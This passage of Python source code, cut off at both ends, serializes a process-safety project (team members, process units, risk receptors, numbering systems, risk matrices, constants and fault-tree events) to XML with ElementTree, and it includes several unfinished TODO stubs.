'':\n\t\tMyXMLRoot_Description = ET.SubElement(MyXMLRoot, info.DescriptionTag)\n\t\tMyXMLRoot_Description.text = pS(str(Proj.Description))\n\n\t# EditNumber\n\tif Proj.EditNumber != '':\n\t\tMyXMLRoot_EditNumber = ET.SubElement(MyXMLRoot, info.EditNumberTag)\n\t\tMyXMLRoot_EditNumber.text = pS(str(Proj.EditNumber))\n\n\t# TeamMembers\n\tif len(Proj.TeamMembers) > 0 :\n\t\t# create outer XML tag\n\t\tMyXMLRoot_TeamMembers = ET.SubElement(MyXMLRoot, info.TeamMembersTag)\n\n\t\t# TeamMember\n\t\teach_teamMember: core_classes.TeamMember\n\t\tfor each_teamMember in Proj.TeamMembers:\n\t\t\tMyXMLRoot_TeamMembers_TeamMember = ET.SubElement(MyXMLRoot_TeamMembers, info.TeamMemberTag)\n\t\t\tassert type(each_teamMember) == core_classes.TeamMember\n\n\t\t\t# \n\t\t\tMyXMLRoot_TeamMembers_TeamMember_ID = ET.SubElement(MyXMLRoot_TeamMembers_TeamMember, info.IDTag)\n\t\t\tMyXMLRoot_TeamMembers_TeamMember_ID.text = pS(str(each_teamMember.iD))\n\n\t\t\t# \n\t\t\tMyXMLRoot_TeamMembers_TeamMember_Name = ET.SubElement(MyXMLRoot_TeamMembers_TeamMember, info.NameTag)\n\t\t\tMyXMLRoot_TeamMembers_TeamMember_Name.text = pS(each_teamMember.name)\n\n\t\t\t# \n\t\t\tMyXMLRoot_TeamMembers_TeamMember_Role = ET.SubElement(MyXMLRoot_TeamMembers_TeamMember, info.RoleTag)\n\t\t\tMyXMLRoot_TeamMembers_TeamMember_Role.text = pS(each_teamMember.role)\n\n\t\t\t# < Affiliation[Affiliation as str] / >\n\t\t\tMyXMLRoot_TeamMembers_TeamMember_Affiliation = ET.SubElement(MyXMLRoot_TeamMembers_TeamMember, info.AffiliationTag)\n\t\t\tMyXMLRoot_TeamMembers_TeamMember_Affiliation.text = pS(each_teamMember.affiliation)\n\n\t#Process Units\n\tif len(Proj.ProcessUnits) > 0:\n\t\t# create outer XML tag\n\t\tMyXMLRoot_ProcessUnits = ET.SubElement(MyXMLRoot, info.ProcessUnitsTag)\n\n\t\tfor each_ProcessUnit in Proj.ProcessUnits:\n\t\t\tMyXMLRoot_ProcessUnits_ProcessUnit = ET.SubElement(MyXMLRoot_ProcessUnits, info.ProcessUnitTag)\n\t\t\tassert type(each_ProcessUnit) == projects.ProcessUnit\n\n\t\t\t# \n\t\t\tMyXMLRoot_ProcessUnits_ProcessUnit_ID = ET.SubElement(MyXMLRoot_ProcessUnits_ProcessUnit, info.IDTag)\n\t\t\tMyXMLRoot_ProcessUnits_ProcessUnit_ID.text = pS(str(each_ProcessUnit.ID))\n\n\t\t\t# \n\t\t\tMyXMLRoot_ProcessUnits_ProcessUnit_UnitNumber = ET.SubElement(MyXMLRoot_ProcessUnits_ProcessUnit, info.UnitNumberTag)\n\t\t\tMyXMLRoot_ProcessUnits_ProcessUnit_UnitNumber.text = pS(str(each_ProcessUnit.UnitNumber))\n\n\t\t\t# \n\t\t\tMyXMLRoot_ProcessUnits_ProcessUnit_ShortName = ET.SubElement(MyXMLRoot_ProcessUnits_ProcessUnit, info.ShortNameTag)\n\t\t\tMyXMLRoot_ProcessUnits_ProcessUnit_ShortName.text = pS(str(each_ProcessUnit.ShortName))\n\n\t\t\t# \n\t\t\tMyXMLRoot_ProcessUnits_ProcessUnit_LongName = ET.SubElement(MyXMLRoot_ProcessUnits_ProcessUnit, info.LongNameTag)\n\t\t\tMyXMLRoot_ProcessUnits_ProcessUnit_LongName.text = pS(str(each_ProcessUnit.LongName))\n\n\t#Risk Receptors\n\tif len(Proj.RiskReceptors) > 0:\n\t\t# create outer XML tag\n\t\tMyXMLRoot_RiskReceptors = ET.SubElement(MyXMLRoot, info.RiskReceptorsTag)\n\n\t\tfor each_RiskReceptor in Proj.RiskReceptors:\n\t\t\tassert type(each_RiskReceptor) == core_classes.RiskReceptorItem\n\t\t\tMyXMLRoot_RiskReceptors_RiskReceptor = ET.SubElement(MyXMLRoot_RiskReceptors, info.RiskReceptorTag)\n\n\t\t\t# \n\t\t\tMyXMLRoot_RiskReceptors_RiskReceptor_ID = ET.SubElement(MyXMLRoot_RiskReceptors_RiskReceptor, info.IDTag)\n\t\t\tMyXMLRoot_RiskReceptors_RiskReceptor_ID.text = pS(str(each_RiskReceptor.ID))\n\n\t\t\t#\n\t\t\tMyXMLRoot_RiskReceptors_RiskReceptor_HumanName = 
ET.SubElement(MyXMLRoot_RiskReceptors_RiskReceptor, info.NameTag)\n\t\t\tMyXMLRoot_RiskReceptors_RiskReceptor_HumanName.text = pS(each_RiskReceptor.HumanName)\n\n\t# Numbering Systems\n\tif len(Proj.NumberSystems) > 0:\n\t\t# create outer XML tag\n\t\tMyXMLRoot_NumberSystem = ET.SubElement(MyXMLRoot, info.NumberSystemTag)\n\n\t\tfor each_NumberSystem in Proj.NumberSystems:\n\t\t\t#TODO J: cannot map NumberSystem ID\n\n\t\t\t# create outer XML tag\n\t\t\tMyXMLRoot_NumberSystem_Chunk = ET.SubElement(MyXMLRoot_NumberSystem, info.NumberSystemTag)\n\n\t\t\t#each_NumberSystem: str\n\t\t\tif type(each_NumberSystem) == str:\n\t\t\t\tMyXMLRoot_NumberSystem_Chunk_Type = ET.SubElement(MyXMLRoot_NumberSystem_Chunk, info.TypeTag)\n\t\t\t\tMyXMLRoot_NumberSystem_Chunk_Type.text = pS(info.NumberSystemStringType)\n\n\t\t\t\tMyXMLRoot_NumberSystem_Chunk_Value = ET.SubElement(MyXMLRoot_NumberSystem_Chunk, info.ValueTag)\n\t\t\t\tMyXMLRoot_NumberSystem_Chunk_Value.text = pS(each_NumberSystem)\n\n\t\t\t#each_NumberSystem: core_classes.ParentNumberChunkItem\n\t\t\telif type(each_NumberSystem) == core_classes.ParentNumberChunkItem:\n\t\t\t\tMyXMLRoot_NumberSystem_Chunk_Type = ET.SubElement(MyXMLRoot_NumberSystem_Chunk, info.TypeTag)\n\t\t\t\tMyXMLRoot_NumberSystem_Chunk_Type.text = pS(info.NumberSystemParentType)\n\n\t\t\t\tMyXMLRoot_NumberSystem_Chunk_ID = ET.SubElement(MyXMLRoot_NumberSystem_Chunk, info.IDAttribName)\n\t\t\t\tMyXMLRoot_NumberSystem_Chunk_ID.text = pS(each_NumberSystem.Source)\n\n\t\t\t#each_NumberSystem: core_classes.SerialNumberChunkItem\n\t\t\telif type(each_NumberSystem) == core_classes.SerialNumberChunkItem:\n\t\t\t\tMyXMLRoot_NumberSystem_Chunk_Type = ET.SubElement(MyXMLRoot_NumberSystem_Chunk, info.TypeTag)\n\t\t\t\tMyXMLRoot_NumberSystem_Chunk_Type.text = pS(info.NumberSystemSerialType)\n\n\t\t\t\t#FieldWidth\n\t\t\t\tMyXMLRoot_NumberSystem_Chunk_FieldWidth = ET.SubElement(MyXMLRoot_NumberSystem_Chunk, info.FieldWidthTag)\n\t\t\t\tMyXMLRoot_NumberSystem_Chunk_FieldWidth.text = pS(str(each_NumberSystem.FieldWidth))\n\n\t\t\t\t#PadChar\n\t\t\t\tMyXMLRoot_NumberSystem_Chunk_PadChar = ET.SubElement(MyXMLRoot_NumberSystem_Chunk, info.PadCharTag)\n\t\t\t\tMyXMLRoot_NumberSystem_Chunk_PadChar.text = pS(str(each_NumberSystem.PadChar))\n\n\t\t\t\t#StartSequenceAt\n\t\t\t\tMyXMLRoot_NumberSystem_Chunk_StartSequenceAt = ET.SubElement(MyXMLRoot_NumberSystem_Chunk, info.StartSequenceAtTag)\n\t\t\t\tMyXMLRoot_NumberSystem_Chunk_StartSequenceAt.text = pS(str(each_NumberSystem.StartSequenceAt))\n\n\t\t\t\t#SkipTo\n\t\t\t\tif each_NumberSystem.SkipTo is not None:\n\t\t\t\t\tMyXMLRoot_NumberSystem_Chunk_SkipTo = ET.SubElement(MyXMLRoot_NumberSystem_Chunk, info.SkipToTag)\n\t\t\t\t\tMyXMLRoot_NumberSystem_Chunk_SkipTo.text = pS(str(each_NumberSystem.SkipTo))\n\n\t\t\t\t#GapBefore\n\t\t\t\tMyXMLRoot_NumberSystem_Chunk_GapBefore = ET.SubElement(MyXMLRoot_NumberSystem_Chunk, info.GapBeforeTag)\n\t\t\t\tMyXMLRoot_NumberSystem_Chunk_GapBefore.text = pS(str(each_NumberSystem.GapBefore))\n\n\t\t\t\t#IncludeInNumbering\n\t\t\t\tMyXMLRoot_NumberSystem_Chunk_IncludeInNumbering = ET.SubElement(MyXMLRoot_NumberSystem_Chunk, info.IncludeInNumberingTag)\n\t\t\t\tMyXMLRoot_NumberSystem_Chunk_IncludeInNumbering.text = pS(str(each_NumberSystem.IncludeInNumbering))\n\n\t\t\t\t#NoValue\n\t\t\t\tMyXMLRoot_NumberSystem_Chunk_NoValue = ET.SubElement(MyXMLRoot_NumberSystem_Chunk, info.NoValueTag)\n\t\t\t\tMyXMLRoot_NumberSystem_Chunk_NoValue.text = pS(each_NumberSystem.NoValue)\n\n\t\t\telse:\n\t\t\t\traise 
Exception('NumberSystem type incorrect.')\n\n\t# Risk Matrix\n\tif len(Proj.RiskMatrices) > 0:\n\n\t\t# LookupTableItem\n\t\tfor each_RiskMatrix in Proj.RiskMatrices:\n\t\t\tassert type(each_RiskMatrix) == core_classes.LookupTableItem\n\t\t\tMyXMLRoot_RiskMatrix = ET.SubElement(MyXMLRoot, info.RiskMatrixTag)\n\n\t\t\t# \n\t\t\t# Map to Keys\n\t\t\tif len(each_RiskMatrix.Keys) > 0:\n\t\t\t\teach_Category: core_classes.CategoryNameItem\n\t\t\t\t# TODO J: cannot map the object attribute which stores the list of categories\n\t\t\t\tfor each_Category in each_RiskMatrix.Value:\n\n\t\t\t\t\t#Category\n\t\t\t\t\tMyXMLRoot_RiskMatrix_Category = ET.SubElement(MyXMLRoot_RiskMatrix, info.CategoryTag)\n\n\t\t\t\t\t# ID\n\t\t\t\t\t# TODO J: cannot map Catergory ID\n\t\t\t\t\t\"\"\"\n\t\t\t\t\tMyXMLRoot_RiskMatrix_Category_ID = ET.SubElement(MyXMLRoot_RiskMatrix_Category, info.IDTag)\n\t\t\t\t\tMyXMLRoot_RiskMatrix_Category_ID.text = pS(each_Key.)\n\t\t\t\t\t\"\"\"\n\n\t\t\t\t\t# Name\n\t\t\t\t\tMyXMLRoot_RiskMatrix_Category_Name = ET.SubElement(MyXMLRoot_RiskMatrix_Category, info.NameTag)\n\t\t\t\t\tMyXMLRoot_RiskMatrix_Category_Name.text = pS(each_Category.HumanName)\n\n\t\t\t\t\t# Description\n\t\t\t\t\tMyXMLRoot_RiskMatrix_Category_Description = ET.SubElement(MyXMLRoot_RiskMatrix_Category,info.DescriptionTag)\n\t\t\t\t\tMyXMLRoot_RiskMatrix_Category_Description.text = pS(each_Category.HumanDescription)\n\t\t\t\t\tpass\n\n\t\t\t\tMyXMLRoot_RiskMatrix_SeverityDimensionIndex = ET.SubElement(MyXMLRoot_RiskMatrix, info.SeverityDimensionTag)\n\t\t\t\tMyXMLRoot_RiskMatrix_SeverityDimensionIndex.text = pS(str(each_RiskMatrix.SeverityDimensionIndex))\n\n\t\t\t\t# Dimension\n\t\t\t\teach_list_of_keys: core_classes.CategoryNameItem\n\t\t\t\tfor each_list_of_keys in each_RiskMatrix.Keys:\n\t\t\t\t\tfor inner_list in each_list_of_keys:\n\t\t\t\t\t\tMyXMLRoot_RiskMatrix_Dimension = ET.SubElement(MyXMLRoot_RiskMatrix, info.DimensionTag)\n\n\t\t\t\t\t\t# TODO J: what is the attribute\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\tMyXMLRoot_RiskMatrix_Dimension_Name = ET.SubElement(MyXMLRoot_RiskMatrix_Dimension, info.NameTag)\n\t\t\t\t\t\tMyXMLRoot_RiskMatrix_Dimension_Name.text = pS(inner_list.)\n\n\t\t\t\t\t\tMyXMLRoot_RiskMatrix_Dimension_Key = ET.SubElement(MyXMLRoot_RiskMatrix_Dimension, info.KeyTag)\n\t\t\t\t\t\tMyXMLRoot_RiskMatrix_Dimension_Key.text = pS(inner_list.)\n\t\t\t\t\t\t\"\"\"\n\t\t\t\t\t\t# ID\n\t\t\t\t\t\t# TODO J: cannot map Catergory ID\n\n\t\t\t\t# Value\n\t\t\t\tfor each_value in each_RiskMatrix.Value:\n\t\t\t\t\t#assert type(each_value) == core_classes.RiskReceptorItem\n\t\t\t\t\t# TODO how risk receptor contains a value? 
By which attribute?\n\n\t\t\t\t\tassert issubclass(type(each_value), core_classes.NumValueItem)\n\t\t\t\t\tMyXMLRoot_RiskMatrix_Entry = ET.SubElement(MyXMLRoot_RiskMatrix, info.EntryTag)\n\n\t\t\t\t\tif type(each_value) == core_classes.UserNumValueItem:\n\t\t\t\t\t\t# Kind\n\t\t\t\t\t\tMyXMLRoot_RiskMatrix_Entry_Kind = ET.SubElement(MyXMLRoot_RiskMatrix_Entry, info.KindTag)\n\n\t\t\t\t\t\t# RiskReceptor\n\t\t\t\t\t\tMyXMLRoot_RiskMatrix_Entry_RiskReceptor = ET.SubElement(MyXMLRoot_RiskMatrix_Entry, info.RiskReceptorTag)\n\t\t\t\t\t\tMyXMLRoot_RiskMatrix_Entry_RiskReceptor.text = None\n\n\n\t\t\t\t\t\tpass\n\t\t\t\t\telif type(each_value) == core_classes.ConstantItem:\n\n\t\t\t\t\t\tpass\n\t\t\t\t\telif type(each_value) == core_classes.LookupNumValueItem:\n\n\t\t\t\t\t\tpass\n\t\t\t\t\telif type(each_value) == core_classes.CategoryNameItem:\n\n\t\t\t\t\t\tpass\n\t\t\t\t\telif type(each_value) == core_classes.ParentNumValueItem:\n\n\t\t\t\t\t\tpass\n\n\n\t\t\t\t\tpass\n\n\t\t\t\tpass\n\t\t\tpass\n\t\tpass\n\n\t#Constants\n\t# J: TODO\n\tif len(Proj.Constants) > 0:\n\t\t# create outer XML tag\n\t\tMyXMLRoot_Constants = ET.SubElement(MyXMLRoot, info.ConstantsTag)\n\n\t\tfor each_Constant in Proj.Constants:\n\t\t\tassert type(each_Constant) == core_classes.ConstantItem\n\t\t\teach_Constant: core_classes.ConstantItem\n\t\t\tMyXMLRoot_Constants_Constant = ET.SubElement(MyXMLRoot_Constants, info.ConstantTag)\n\n\t\t\t#ID\n\t\t\tMyXMLRoot_Constants_Constant_Id = ET.SubElement(MyXMLRoot_Constants_Constant, info.IDTag)\n\t\t\tMyXMLRoot_Constants_Constant_Id.text = each_Constant.ID\n\n\t\t\t#Name\n\t\t\tMyXMLRoot_Constants_Constant_Name = ET.SubElement(MyXMLRoot_Constants_Constant, info.NameTag)\n\t\t\tMyXMLRoot_Constants_Constant_Name.text = each_Constant.HumanName\n\n\t\t\t#ConstValue\n\t\t\t#MyXMLRoot_Constants_Constant_ConstValue = ET.SubElement(MyXMLRoot_Constants_Constant, info.ConstValueTag)\n\t\t\t#MyXMLRoot_Constants_Constant_ConstValue.text = each_Constant.\n\n\n\t#FaultTree\n\tif len(Proj.FaultTree) > 0:\n\t\t# create outer XML tag\n\t\tMyXMLRoot_FaultTrees = ET.SubElement(MyXMLRoot, info.FaultTreesTag)\n\n\t\teach_FaultTree: faulttree.FTObjectInCore\n\t\tfor each_FaultTree in Proj.FaultTrees:\n\t\t\tassert type(each_FaultTree) == faulttree.FTObjectInCore\n\n\t\t\tMyXMLRoot_FaultTrees_FaultTree = ET.SubElement(MyXMLRoot_FaultTrees, info.FaultTreeTag)\n\n\t\t\t#ID\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_Id = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree, info.IDTag)\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_Id.text = pS(str(each_FaultTree.ID))\n\n\t\t\t#SIFName\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_SIFName = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree, info.SIFNameTag)\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_SIFName.text = pS(str(each_FaultTree.SIFName))\n\n\t\t\t#OpMode\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_OpMode = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree, info.OpModeTag)\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_OpMode.text = pS(str(each_FaultTree.OpMode.XMLName))\n\n\t\t\t#Rev\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_Rev = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree, info.RevTag)\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_Rev.text = pS(each_FaultTree.Rev)\n\n\t\t\t#TargetRiskRedMeasure\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_TargetRiskRedMeasure = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree, info.TargetRiskRedMeasureTag)\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_TargetRiskRedMeasure.text = pS(each_FaultTree.TargetRiskRedMeasure)\n\n\t\t\t#SILTargetValue\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_SILTargetValue = 
ET.SubElement(MyXMLRoot_FaultTrees_FaultTree, info.SILTargetValueTag)\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_SILTargetValue.text = pS(each_FaultTree.SILTargetValue)\n\n\t\t\t#BackgColour\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_BackgColour = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree, info.BackgColour)\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_BackgColour.text = pS(each_FaultTree.BackgColour)\n\n\t\t\t#TextColour\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_TextColour = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree, info.TextColour)\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_TextColour.text = pS(each_FaultTree.TextColour)\n\n\t\t\t#Columns\n\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree, info.ColumnsTag)\n\n\t\t\teach_Column: FTColumnInCore\n\t\t\tfor each_Column in each_FaultTree.Columns:\n\t\t\t\t#Column\n\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns,info.FTColumnTag)\n\n\t\t\t\tfor each_FTEvent in each_Column:\n\n\t\t\t\t\tif type(each_FTEvent) == faulttree.FTEventInCore:\n\t\t\t\t\t\t#FTEvent\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column, info.FTEventTag)\n\n\t\t\t\t\t\t#ID\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_ID = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent, info.IDTag)\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_ID.text = pS(str(each_FTEvent.ID))\n\n\t\t\t\t\t\t#IsIPL\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_IsIPL = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent, info.IsIPLTag)\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_IsIPL.text = pS(str(each_FTEvent.IsIPL))\n\n\t\t\t\t\t\t#EventType\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_EventType = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent, info.EventTypeTag)\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_EventType.text = pS(str(each_FTEvent.EventType))\n\n\t\t\t\t\t\t#NumberingID\n\t\t\t\t\t\t#TODO cannot map ID\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_Numbering = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent, info.NumberingTag)\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_Numbering.text = pS(str(each_FTEvent.NumberingID))\n\n\t\t\t\t\t\t#EventDescription\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_EventDescription = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent, info.EventDescriptionTag)\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_EventDescription.text = pS(str(each_FTEvent.EventDescription))\n\n\t\t\t\t\t\t#OldFreqValue\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_OldFreqValue = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent, info.OldFreqValueTag)\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_OldFreqValue.text = pS(each_FTEvent.OldFreqValue.XMLName)\n\n\t\t\t\t\t\t#OldProbValue\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_OldProbValue = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent, info.OldProbValueTag)\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_OldProbValue.text = pS(each_FTEvent.OldProbValue.XMLName)\n\n\t\t\t\t\t\teach_LastSelectedUnitPerQtyKind_Key: str\n\t\t\t\t\t\tfor 
each_LastSelectedUnitPerQtyKind_Key in each_FTEvent.LastSelectedUnitPerQtyKind:\n\t\t\t\t\t\t\t# LastSelectedUnit\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_LastSelectedUnit = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent, info.LastSelectedUnitTag)\n\n\t\t\t\t\t\t\t# QtyKind\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_LastSelectedUnit_QtyKind = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_LastSelectedUnit, info.QtyKindTag)\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_LastSelectedUnit_QtyKind.text = pS(str(each_FTEvent.LastSelectedUnitPerQtyKind))\n\n\t\t\t\t\t\t\t#Unit\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_LastSelectedUnit_Unit = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_LastSelectedUnit, info.UnitTag)\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_LastSelectedUnit_Unit.text = pS(str(each_FTEvent.LastSelectedUnitPerQtyKind.get(each_LastSelectedUnitPerQtyKind_Key)))\n\n\t\t\t\t\t\t#IsSIFFailureEventInRelevantOpmode\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_IsSIFFailureEventInRelevantOpmode = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent,info.IsSIFFailureEventInRelevantOpmodeTag)\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_IsSIFFailureEventInRelevantOpmode.text = pS(str(each_FTEvent.IsSIFFailureEventInRelevantOpMode))\n\n\t\t\t\t\t\t#RiskReceptors\n\t\t\t\t\t\tif len(each_FTEvent.ApplicableRiskReceptors) > 0:\n\t\t\t\t\t\t\t'''\n\t\t\t\t\t\t\ttempRiskReceptorList = []\n\t\t\t\t\t\t\tfor each_RiskReceptor in each_FTEvent.ApplicableRiskReceptors:\n\t\t\t\t\t\t\t\ttempRiskReceptorList.append(each_RiskReceptor.ID)\n\t\t\t\t\t\t\t'''\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_RiskReceptors = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent, info.RiskReceptorsTag)\n\t\t\t\t\t\t\teach_RiskReceptor: core_classes.RiskReceptorItem\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_RiskReceptors.text = pS(','.join(list(map(lambda each_RiskReceptor: each_RiskReceptor.ID, each_FTEvent.ApplicableRiskReceptors))))\n\n\t\t\t\t\t\t#BackgColour\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_BackgColour = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent, info.BackgColourTag)\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_BackgColour.text = pS(str(each_FTEvent.BackgColour))\n\n\t\t\t\t\t\t#EventDescriptionComments\n\t\t\t\t\t\tif len(each_FTEvent.EventDescriptionComments) > 0:\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_EventDescriptionComments = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent, info.EventDescriptionCommentsTag)\n\t\t\t\t\t\t\t# J:since AssociatedTextItem does not have an ID, match core_classes.Comment instead\n\t\t\t\t\t\t\teach_EventDescriptionComment: core_classes.Comment\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_EventDescriptionComments.text = pS(','.join(list(map(lambda each_EventDescriptionComment: each_EventDescriptionComment.ID, each_FTEvent.EventDescriptionComments))))\n\n\t\t\t\t\t\t#ValueComments\n\t\t\t\t\t\tif len(each_FTEvent.ValueComments) > 0:\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_ValueComments = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent, 
info.ValueCommentsTag)\n\t\t\t\t\t\t\t# J:since AssociatedTextItem does not have an ID, match core_classes.Comment instead\n\t\t\t\t\t\t\teach_ValueComment: core_classes.Comment\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_ValueComments.text = pS(','.join(list(map(lambda each_ValueComment: each_ValueComment.ID, each_FTEvent.ValueComments))))
\n\n\t\t\t\t\t\t#ShowDescriptionComments\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_ShowDescriptionComments = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent, info.ShowDescriptionCommentsTag)\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_ShowDescriptionComments.text = pS(str(each_FTEvent.ShowDescriptionComments))
\n\n\t\t\t\t\t\t#ShowValueComments\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_ShowValueComments = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent, info.ShowValueCommentsTag)\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_ShowValueComments.text = pS(str(each_FTEvent.ShowValueComments))
\n\n\t\t\t\t\t\t#ConnectTo\n\t\t\t\t\t\tif len(each_FTEvent.ConnectTo) > 0:\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_ConnectTo = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent, info.ConnectToTag)\n\t\t\t\t\t\t\teach_FTEvent.ConnectTo: faulttree.FTEventInCore\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_ConnectTo.text = pS(','.join(list(map(lambda each_ConnectedEvent: each_ConnectedEvent.ID, each_FTEvent.ConnectTo))))
\n\n\t\t\t\t\t\t#LinkedFrom\n\t\t\t\t\t\t#TODO J: what is the type of LinkedFrom item?\n\t\t\t\t\t\tif len(each_FTEvent.LinkedFrom) > 0:\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_LinkedFrom = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent, info.LinkedFromTag)\n\t\t\t\t\t\t\teach_LinkedFromItem: faulttree.FTEventInCore.LinkedFrom\n\t\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTEvent_LinkedFrom.text = pS(','.join(list(map(lambda each_LinkedFromItem: each_LinkedFromItem.ID, each_FTEvent.LinkedFrom))))
\n\n\t\t\t\t\tif type(each_FTEvent) == faulttree.FTGateItemInCore:\n\t\t\t\t\t\t#FTGate\n\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTGate = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column, info.FTGateTag)\n\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTGate_ID = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTGate, info.IDTag)\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTGate_ID.text = pS(str(each_FTEvent.ID))\n\n\t\t\t\t\t\tMyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTGate_GateDescription = ET.SubElement(MyXMLRoot_FaultTrees_FaultTree_Columns_Column_FTGate, 